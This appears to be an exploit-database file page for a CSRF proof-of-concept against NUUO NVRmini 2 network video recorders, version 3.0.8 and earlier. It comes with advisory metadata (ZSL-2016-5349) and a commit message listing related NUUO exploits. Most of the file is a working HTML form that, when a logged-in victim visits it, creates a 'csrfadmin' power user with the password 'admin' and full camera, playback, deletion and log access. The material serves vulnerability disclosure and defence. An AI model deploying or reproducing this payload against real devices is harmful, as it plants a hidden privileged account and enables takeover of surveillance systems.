e161127711
8 new exploits Kodi Web Server 16.1 - Denial of Service NUUO NVRmini 2 3.0.8 - Remote Root Exploit NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF NUUO NVRmini 2 3.0.8 - Local File Disclosure NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access
66 lines
2.6 KiB
HTML
Executable file
66 lines
2.6 KiB
HTML
Executable file
<!--
|
|
|
|
NUUO CSRF Add Admin Exploit
|
|
|
|
|
|
Vendor: NUUO Inc.
|
|
Product web page: http://www.nuuo.com
|
|
Affected version: <=3.0.8 (NE-4160, NT-4040)
|
|
|
|
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
|
|
functionality. Setup is simple and easy, with automatic port forwarding
|
|
settings built in. NVRmini 2 supports POS integration, making this the perfect
|
|
solution for small retail chain stores. NVRmini 2 also comes full equipped as
|
|
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
|
|
and RAID functions for data protection. Choose NVR and know that your valuable video
|
|
data is safe, always.
|
|
|
|
Desc: The application interface allows users to perform certain actions via HTTP
|
|
requests without performing any validity checks to verify the requests. This can be
|
|
exploited to perform certain actions with administrative privileges if a logged-in
|
|
user visits a malicious web site.
|
|
|
|
|
|
Tested on: GNU/Linux 3.0.8 (armv7l)
|
|
GNU/Linux 2.6.31.8 (armv5tel)
|
|
lighttpd/1.4.28
|
|
PHP/5.5.3
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2016-5349
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5349.php
|
|
|
|
|
|
14.01.2016
|
|
|
|
-->
|
|
|
|
|
|
<!-- 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -->
|
|
<html>
|
|
<body>
|
|
<form action="http://10.0.0.17/users_xml.php">
|
|
<input type="hidden" name="_password2" value="admin" />
|
|
<input type="hidden" name="addusername" value="csrfadmin" />
|
|
<input type="hidden" name="password" value="admin" />
|
|
<input type="hidden" name="cmd" value="adduser" />
|
|
<input type="hidden" name="group" value="poweruser" />
|
|
<input type="hidden" name="displaygroup" value="power user" />
|
|
<input type="hidden" name="magic" value="574" />
|
|
<input type="hidden" name="liveacc" value="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" />
|
|
<input type="hidden" name="pbacc" value="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" />
|
|
<input type="hidden" name="ptzacc" value="1" />
|
|
<input type="hidden" name="ioacc" value="1" />
|
|
<input type="hidden" name="backupacc" value="1" />
|
|
<input type="hidden" name="deleteacc" value="1" />
|
|
<input type="hidden" name="emapeacc" value="1" />
|
|
<input type="hidden" name="remotalkacc" value="1" />
|
|
<input type="hidden" name="logacc" value="1" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|